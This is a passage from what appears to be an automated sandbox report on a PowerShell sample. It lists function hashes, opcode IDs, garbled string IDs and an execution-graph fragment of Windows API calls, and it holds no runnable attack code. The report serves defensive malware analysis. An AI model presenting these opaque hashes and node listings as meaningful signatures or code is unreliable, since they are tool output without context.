                                • Instruction Fuzzy Hash: 31F01275100A80AFD765CF05CD85D23BBB9EFC9664B198489E84A8B756CB35FC41CF60
                                Function 02B390F0 Relevance: .0, Instructions: 31COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 98fea243b1e340bcb1824a25e18ae0e8ae3cdc6d0ff80118e3910ec4a2356ab6
                                • Instruction ID: cb2415679f39061a272cdb0b3428cb77d6d92ef44568350d86106f8b7379bda5
                                • Opcode Fuzzy Hash: 98fea243b1e340bcb1824a25e18ae0e8ae3cdc6d0ff80118e3910ec4a2356ab6
                                • Instruction Fuzzy Hash: 80F027B16041085BD700AB65D0083EB7B97DFC0718F24816AC91A47384CE396806CFD1
                                Function 02B37697 Relevance: .0, Instructions: 31COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 529774394b40039a940ccd95e38d71f73174014ee586ee42f23cb56bae042e3f
                                • Instruction ID: ba4ffcf2e769d1f1d9a3831ae68a0db9dde56e2057143f2de8a292798d236253
                                • Opcode Fuzzy Hash: 529774394b40039a940ccd95e38d71f73174014ee586ee42f23cb56bae042e3f
                                • Instruction Fuzzy Hash: 99F0A0797001088FCB00DB6D9A50A9ABBE6EFC925571541D9E909DB324DF24CC02CF91
                                Function 02B39549 Relevance: .0, Instructions: 31COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f000f7469fdc336f7ccdb49093e89e4fe183e217e464f1de51693bd8211aaec3
                                • Instruction ID: 9775ffb986ab2cb4fc79d344ce339968b5f75db579cd20a090427f2d555b3e54
                                • Opcode Fuzzy Hash: f000f7469fdc336f7ccdb49093e89e4fe183e217e464f1de51693bd8211aaec3
                                • Instruction Fuzzy Hash: B1E0DF9771A3153B891221BA58003FA768FCBC65B0B4A12B2AA15C7A82DD40EC4603E2
                                Function 02B3DED8 Relevance: .0, Instructions: 30COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 090291f040205fdb72b070469662eeedb5078ab8da42adb73100aef9278cb1fd
                                • Instruction ID: 8c0ee1acac7c4dd9ad8ae90d65192568781a6a2f7f9ea11cc2dcaef9eb8f56f1
                                • Opcode Fuzzy Hash: 090291f040205fdb72b070469662eeedb5078ab8da42adb73100aef9278cb1fd
                                • Instruction Fuzzy Hash: 4DE0E5357001118F86109B1ED498C26BBFAEFCE62932904AAF549CB735DB61EC018B90
                                Function 02B3AF98 Relevance: .0, Instructions: 30COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ca5cb53586d133ca03e06d565fe49b85c556379e9f5a7290b146936c79a3afda
                                • Instruction ID: ed0fe41b5ec781da56c7b4e241008c1c04974e6559e293d5042f9cb07d6dd9a7
                                • Opcode Fuzzy Hash: ca5cb53586d133ca03e06d565fe49b85c556379e9f5a7290b146936c79a3afda
                                • Instruction Fuzzy Hash: DFE0DF27309391078B17803A3C600E6BF6787C357031881FBE484CB682DC059E4243A1
                                Function 02B39170 Relevance: .0, Instructions: 25COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6b70d1b63ed722066a0cd4e9dc4de1574cdf5faae5d074f3d152a9fcd9804b49
                                • Instruction ID: a9fdfa2f43d162e8b881e79f57cb3761c97c1dc5e10895b1c903eed68c6b947b
                                • Opcode Fuzzy Hash: 6b70d1b63ed722066a0cd4e9dc4de1574cdf5faae5d074f3d152a9fcd9804b49
                                • Instruction Fuzzy Hash: C0F06D709007045BD7609B79E89C39ABBE6FB44320F004469D11EC7340DF396881CB90
                                Function 02B38739 Relevance: .0, Instructions: 24COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 79293b86b9aa6e72bd563d6b53a81c977c3fa48e4e4f0f2d6ac59cf992be881d
                                • Instruction ID: 38ec64a8082831393abef935762686110466b4d5ac242ce0fbddbdfeedc8c209
                                • Opcode Fuzzy Hash: 79293b86b9aa6e72bd563d6b53a81c977c3fa48e4e4f0f2d6ac59cf992be881d
                                • Instruction Fuzzy Hash: ADE0483A80510D87C705BB74EC168FDBF30FB00311B000199D50651641DE359A46CAC1
                                Function 02B38800 Relevance: .0, Instructions: 24COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0faec2ceed04d522c3524afd98ab550cb60ccb87d12372e16b32c9fd3c73dab0
                                • Instruction ID: 7d299b93642c9f5a7dedf69cd0cb47955aa456bdb80328e7f516cdb263a1df4f
                                • Opcode Fuzzy Hash: 0faec2ceed04d522c3524afd98ab550cb60ccb87d12372e16b32c9fd3c73dab0
                                • Instruction Fuzzy Hash: BCE04F3A90920E9BC704EB74EC465EDBFB5AB05316B004166EA1993B40DB31AD46CBD2
                                Function 02B38978 Relevance: .0, Instructions: 24COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8ffd3d86c6f06d8dac3c38826b8512b9b237b71fd05a22d19d78d3b67476945a
                                • Instruction ID: 3aa6a8b815dea1474d5225523109b73a90d7a4dc23b17e9ccdf085ca5e2228a6
                                • Opcode Fuzzy Hash: 8ffd3d86c6f06d8dac3c38826b8512b9b237b71fd05a22d19d78d3b67476945a
                                • Instruction Fuzzy Hash: 84E08C3570461897CF093B79A91C2AE7A9BFBC4735F04016AE61A87380CF7D5902C7EA
                                Function 02B39558 Relevance: .0, Instructions: 23COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 16b5b17e4bd048621560e818272a2a127720180be3d669b21ef1943bb76079ef
                                • Instruction ID: be92ece1a22ef7aa1d5e2817cbedc9c912dfdcb40da4a86c85b33c78eadf70c5
                                • Opcode Fuzzy Hash: 16b5b17e4bd048621560e818272a2a127720180be3d669b21ef1943bb76079ef
                                • Instruction Fuzzy Hash: 3DD05E937022292B895620AB58007BBB1CFCBC55A078A00B6AF05D3642EE80DC0503E2
                                Function 02B3F860 Relevance: .0, Instructions: 23COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1743893def3ffb6415c37e3fdb30e48e2c2b0fbd6261f2f2871a1370dcf95eb6
                                • Instruction ID: a403e7d832c6c62880b4ad9bdea52002dc6a085bea8dec29f4c1149332d094f0
                                • Opcode Fuzzy Hash: 1743893def3ffb6415c37e3fdb30e48e2c2b0fbd6261f2f2871a1370dcf95eb6
                                • Instruction Fuzzy Hash: 73E01270D45249AF8790EF7D884199AFFF49B49200F1080AD9948E7211E6319502CBD1
                                Function 02B3DD28 Relevance: .0, Instructions: 23COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 36dc820b3a3502a95cb39c0df34ad4eff7b289fbb6f6a119d9eef6fe7426979d
                                • Instruction ID: 26cfb220f8a586175b381aa2751d429bd9788bf55a8ad55306a60c1b83dcd075
                                • Opcode Fuzzy Hash: 36dc820b3a3502a95cb39c0df34ad4eff7b289fbb6f6a119d9eef6fe7426979d
                                • Instruction Fuzzy Hash: 76E0C23278061947C616662EA91089F77EFDFC5671310407EE00EC7300DF64EC058BE5
                                Function 02B3DD78 Relevance: .0, Instructions: 23COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                • Instruction ID: 25c69502d43c7b594d0ec8e12912f9f438846c7842f3de594c674cdcbe0174e9
                                • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                • Instruction Fuzzy Hash: C8E08631B00014978B089559D4104EDFBAADBCC621F0480BAD90AA7340DA326916C6E1
                                Function 02B3F870 Relevance: .0, Instructions: 16COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                • Instruction ID: a6c01fd34e90c8e13e6d13a4171d5a748705212c1a337b1f4e4871f88c95c2ce
                                • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                • Instruction Fuzzy Hash: AED067B0D05209DF8784EFADC94156EFBF4EB58200F6085AA8919E7301E7329A12CBD1
                                Function 02B38748 Relevance: .0, Instructions: 15COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ccbd504d89ee6de7a5a711ea2176f319cd8585b21338a1df155a09458991feda
                                • Instruction ID: f3823f0e452ee92107b2d3a93d30b45fa3275b8f70e5264858829bf417c416ed
                                • Opcode Fuzzy Hash: ccbd504d89ee6de7a5a711ea2176f319cd8585b21338a1df155a09458991feda
                                • Instruction Fuzzy Hash: 80D0673580410DCBDB09ABB4E85B8BDBB75FB14301F4041A9E90752291EF359A5ACAC5
                                Function 02B38810 Relevance: .0, Instructions: 15COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7d8f9eade9ddde9abf12dabcfd3dbafdb2bf12cd3129f6b8bf39a6f49d9aab8c
                                • Instruction ID: fba16c2ff754652f285670a361fa7e74eabce6b2fbeb7472a67dcebbf75dd60b
                                • Opcode Fuzzy Hash: 7d8f9eade9ddde9abf12dabcfd3dbafdb2bf12cd3129f6b8bf39a6f49d9aab8c
                                • Instruction Fuzzy Hash: DFD01734A0820E9BCB08EFA4E84A86EBBB5FB44300F008269EA0993340EA305901CBC1
                                Function 02B37932 Relevance: .0, Instructions: 11COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4909405b1ae03d55d15917d3ce90502de59b61de3a949266f1774436b14ec4bd
                                • Instruction ID: 0330a9207352f84fe1fb4ed00a747ddbe162fc39e1afd79ab097a2f335d544a5
                                • Opcode Fuzzy Hash: 4909405b1ae03d55d15917d3ce90502de59b61de3a949266f1774436b14ec4bd
                                • Instruction Fuzzy Hash: B4D012B54483889BCB255F7C90D4D043F50EF52215F004ADDD88A4A593C937C049CF41
                                Function 02B37EA0 Relevance: .0, Instructions: 10COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 580770c5668fd38cfbc3bfc7bce5860535b740f96c4624bd611f4f35f5211581
                                • Instruction ID: a42fde337d1bda8e060ae157e0e4dbdfe6d67eb2e9e871e89b46943f4c794124
                                • Opcode Fuzzy Hash: 580770c5668fd38cfbc3bfc7bce5860535b740f96c4624bd611f4f35f5211581
                                • Instruction Fuzzy Hash: B4C09B7692D1404FEF0CCB358469F277B326766701F07879EC083968D4CE65400AEF01
                                Function 02B37940 Relevance: .0, Instructions: 8COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a2fa2798db03321e1037ffe73d2c464d275223d9103f3b09b41e294641743206
                                • Instruction ID: 36131a082458e513a12cefa97ac67fe1662a7b0a9912a0441b05ba3560b91740
                                • Opcode Fuzzy Hash: a2fa2798db03321e1037ffe73d2c464d275223d9103f3b09b41e294641743206
                                • Instruction Fuzzy Hash: 97B0923004870C8FC2586FB9A454814732DEB85219B8004ECE90E0A6928E36E889CA85

                                Non-executed Functions

                                Function 07321BE0 Relevance: 20.4, Strings: 16, Instructions: 402COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000014.00000002.2271288007.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_7320000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$4']q$4']q$84$l$84$l$pij$tP]q$tP]q$J'l$J'l$J'l$J'l$J'l$r&l$r&l
                                • API String ID: 0-975305132
                                • Opcode ID: 54cc861191abcec1642bb76d1a40ed803fce9d1f606f0755c67c971d156b3096
                                • Instruction ID: 08a1b3246314026c8fdde4c75c1d2cf6243a55409950f57321362f5d9f73b91c
                                • Opcode Fuzzy Hash: 54cc861191abcec1642bb76d1a40ed803fce9d1f606f0755c67c971d156b3096
                                • Instruction Fuzzy Hash: 63D167B1B0422ADFD7258B68991066BFBB6EFC1310F14C4ABC959CB251DB31C846D7A2
                                Function 07323928 Relevance: 10.3, Strings: 8, Instructions: 327COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000014.00000002.2271288007.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_7320000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
                                • API String ID: 0-1910532044
                                • Opcode ID: f306d6cc570400d92c820a00f19eeaca8ea13148483d1d4fe25f8c01966a9a6d
                                • Instruction ID: 81774bf6e00853fa23dd75449f97fa6460676910b5a4f753d0dcf6ff3b1a8b6c
                                • Opcode Fuzzy Hash: f306d6cc570400d92c820a00f19eeaca8ea13148483d1d4fe25f8c01966a9a6d
                                • Instruction Fuzzy Hash: 69A19AB17043658FE7249F7D8810766BBBAEFC6710F24847BD889CB251CA39C846D761
                                Function 02B37A21 Relevance: 6.5, Strings: 5, Instructions: 239COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: tM&l$`^q$`^q$`^q$`^q
                                • API String ID: 0-2479282535
                                • Opcode ID: 1b9ad5f8ddec3f1806825102b20daab03581e5b499c997f6bf7e650d4879c9f3
                                • Instruction ID: df39e49e315394e55a85b052d7a74ce64e61edf4799448f22fd6de6fbc8b6429
                                • Opcode Fuzzy Hash: 1b9ad5f8ddec3f1806825102b20daab03581e5b499c997f6bf7e650d4879c9f3
                                • Instruction Fuzzy Hash: 36B1C574E002099FDB55DFA9D990A9EFBF6FF88300F208629D419AB314DB34A905CF90
                                Function 02B37A30 Relevance: 6.5, Strings: 5, Instructions: 234COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: tM&l$`^q$`^q$`^q$`^q
                                • API String ID: 0-2479282535
                                • Opcode ID: 0cef92b2024c05cddd388eb819e5df1c1efa73b05a570410e46f2dc8ba08da9a
                                • Instruction ID: 5aa01b6219bd64025a83d84e3e2dc2db6cd1c2a4e06dc0137fc728c741f257f5
                                • Opcode Fuzzy Hash: 0cef92b2024c05cddd388eb819e5df1c1efa73b05a570410e46f2dc8ba08da9a
                                • Instruction Fuzzy Hash: 8AB1A574E002099FDB55DFA9D990A9EFBF6FF88300F208669D419AB314DB34A945CF90
                                Function 02B37220 Relevance: 6.5, Strings: 5, Instructions: 223COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: tM&l$`^q$`^q$`^q$`^q
                                • API String ID: 0-2479282535
                                • Opcode ID: 4709732d6f10d7ccba00952e792402eb51dbb25cd1018efcfb716affc81078d3
                                • Instruction ID: ce40f8e1bc5921d1e1350aaaf526d4b5e91836303b5fafc10cfffdabfb00e7e4
                                • Opcode Fuzzy Hash: 4709732d6f10d7ccba00952e792402eb51dbb25cd1018efcfb716affc81078d3
                                • Instruction Fuzzy Hash: 00A19374E002099FDB55DFA9D990A9DFBF6FF88300F208669D419AB314EB34A945CF90
                                Function 07323678 Relevance: 6.4, Strings: 5, Instructions: 187COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000014.00000002.2271288007.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_7320000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$$]q$$]q$$]q
                                • API String ID: 0-2353078639
                                • Opcode ID: 3c979ea5173d2d927e8970b11accd5d4ac853159f38ab3c6bad0fddd7c0fba3c
                                • Instruction ID: 9800ed896cce36f3e7022c606db0912e03cb21c1e746e680dbc57c4046a4513c
                                • Opcode Fuzzy Hash: 3c979ea5173d2d927e8970b11accd5d4ac853159f38ab3c6bad0fddd7c0fba3c
                                • Instruction Fuzzy Hash: BD517DF170436A9FEB245A2D8810666BBBAEFC2610F24806BD44DCB251DE39C847D7A1
                                Function 07322108 Relevance: 6.3, Strings: 5, Instructions: 69COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000014.00000002.2271288007.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_7320000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q$$]q$J'l$J'l$J'l
                                • API String ID: 0-76511075
                                • Opcode ID: 47759b14d04a106026498c732150256cc089dcb192cf0560da2ce40e726eccbc
                                • Instruction ID: 0c750092e1ba50888953a158dd41dcf466ff7252f84ebf2b3792cb888e515c84
                                • Opcode Fuzzy Hash: 47759b14d04a106026498c732150256cc089dcb192cf0560da2ce40e726eccbc
                                • Instruction Fuzzy Hash: 9C1159F26593A68FD736072C5C11913BF66BF82600B1B8597C9D89F12AC634584AD3B3
                                Function 07325798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000014.00000002.2271288007.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_7320000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q$$]q$$]q$$]q
                                • API String ID: 0-858218434
                                • Opcode ID: dc649711f62c4fc6f5070ef6f93b15e16ec9fa117b7f7c6ac6d421d1ad1ad245
                                • Instruction ID: 4672d786c72e2366806e29035a59456a0a7ff3d00f1f23c0a6aa477cda07fbbe
                                • Opcode Fuzzy Hash: dc649711f62c4fc6f5070ef6f93b15e16ec9fa117b7f7c6ac6d421d1ad1ad245
                                • Instruction Fuzzy Hash: 9F216BB23503269BEB24693E8840B37B7DAABC0711F24847BD94DCB381DDB5CA52D361
                                Function 073222E8 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000014.00000002.2271288007.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_7320000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: pij$pij$J'l$J'l
                                • API String ID: 0-1868692445
                                • Opcode ID: faf9e980872961f7f651d1f7f0d3fd3c87d6059ffbb87da83e7d6fc2206e484e
                                • Instruction ID: 7b4d527bbc6afd1c30091ce3df69b20a417f722f8adabbac4e1415c6aa226c67
                                • Opcode Fuzzy Hash: faf9e980872961f7f651d1f7f0d3fd3c87d6059ffbb87da83e7d6fc2206e484e
                                • Instruction Fuzzy Hash: B231F7F1908325DFFF21CF25C8456A7BBB4BF01210F468066E90C8B151D736D986DBA2
                                Function 07322190 Relevance: 5.1, Strings: 4, Instructions: 71COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000014.00000002.2271288007.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_7320000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q$J'l$J'l$J'l
                                • API String ID: 0-735925969
                                • Opcode ID: bc9fd5937e915b11fc936439e9c5b7a3619f2f56fde04246654289980c2bf840
                                • Instruction ID: d3fb07a28ad3e647bb609cc07684977471d87c8f703af8c9f7a32e6d3c2898bb
                                • Opcode Fuzzy Hash: bc9fd5937e915b11fc936439e9c5b7a3619f2f56fde04246654289980c2bf840
                                • Instruction Fuzzy Hash: 111178F271C3B18FE3260A286C12D63BF76BBD2700B1640A7D6489F256C6316846D7B2
                                Function 07320308 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000014.00000002.2271288007.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_7320000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$$]q$$]q
                                • API String ID: 0-978391646
                                • Opcode ID: 6482dacb46ce32f4f37855636c1337a887cc8ff1381f84f939be09a04b40c940
                                • Instruction ID: 4a641160de74f61ad4093d382fe48cba6c80738e2bb99e4aa52676b777b5f5b1
                                • Opcode Fuzzy Hash: 6482dacb46ce32f4f37855636c1337a887cc8ff1381f84f939be09a04b40c940
                                • Instruction Fuzzy Hash: F901BC7060D3DA4FCB2B1238196011A6FB64FC3A4072A40E7C985DB2A7CD294C4A83A7

                                Execution Graph

                                Execution Coverage:10.5%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:168
                                Total number of Limit Nodes:12
                                execution_graph 28203 164d5e0 28204 164d626 GetCurrentProcess 28203->28204 28206 164d671 28204->28206 28207 164d678 GetCurrentThread 28204->28207 28206->28207 28208 164d6b5 GetCurrentProcess 28207->28208 28209 164d6ae 28207->28209 28210 164d6eb 28208->28210 28209->28208 28211 164d713 GetCurrentThreadId 28210->28211 28212 164d744 28211->28212 28415 164b250 28418 164b33a 28415->28418 28416 164b25f 28419 164b37c 28418->28419 28420 164b359 28418->28420 28419->28416 28420->28419 28421 164b580 GetModuleHandleW 28420->28421 28422 164b5ad 28421->28422 28422->28416 28213 93e0ff8 28214 93e1183 28213->28214 28215 93e101e 28213->28215 28215->28214 28218 93e1278 PostMessageW 28215->28218 28220 93e1271 PostMessageW 28215->28220 28219 93e12e4 28218->28219 28219->28215 28221 93e12e4 28220->28221 28221->28215 28245 796db00 28246 796db22 28245->28246 28247 796dd30 28246->28247 28250 796fa71 28246->28250 28268 796fade 28246->28268 28251 796fa9a 28250->28251 28252 796fabe 28251->28252 28287 93e02f3 28251->28287 28292 93e0833 28251->28292 28297 93e0858 28251->28297 28301 93e049d 28251->28301 28306 93e0521 28251->28306 28311 93e0567 28251->28311 28318 93e0107 28251->28318 28323 93e07a9 28251->28323 28328 93e03ed 28251->28328 28333 93e016d 28251->28333 28339 93e066f 28251->28339 28344 93e0911 28251->28344 28348 93e06d1 28251->28348 28353 93e0891 28251->28353 28357 93e0753 28251->28357 28252->28246 28269 796fa6c 28268->28269 28271 796fae1 28268->28271 28270 796fabe 28269->28270 28272 93e049d 2 API calls 28269->28272 28273 93e0858 2 API calls 28269->28273 28274 93e0833 2 API calls 28269->28274 28275 93e02f3 2 API calls 28269->28275 28276 93e0753 2 API calls 28269->28276 28277 93e0891 2 API calls 28269->28277 28278 93e06d1 2 API calls 28269->28278 28279 93e0911 2 API calls 28269->28279 28280 93e066f 2 API calls 28269->28280 28281 93e016d 2 API calls 28269->28281 28282 93e03ed 2 API calls 28269->28282 28283 93e07a9 2 API calls 28269->28283 28284 93e0107 2 API calls 28269->28284 28285 93e0567 4 API calls 28269->28285 28286 93e0521 2 API calls 28269->28286 28270->28246 28271->28246 28272->28270 28273->28270 28274->28270 28275->28270 28276->28270 28277->28270 28278->28270 28279->28270 28280->28270 28281->28270 28282->28270 28283->28270 28284->28270 28285->28270 28286->28270 28288 93e0313 28287->28288 28362 796ce70 28288->28362 28366 796ce68 28288->28366 28289 93e09ab 28289->28252 28293 93e07f0 28292->28293 28294 93e078f 28292->28294 28370 796d4f0 28293->28370 28374 796d4e9 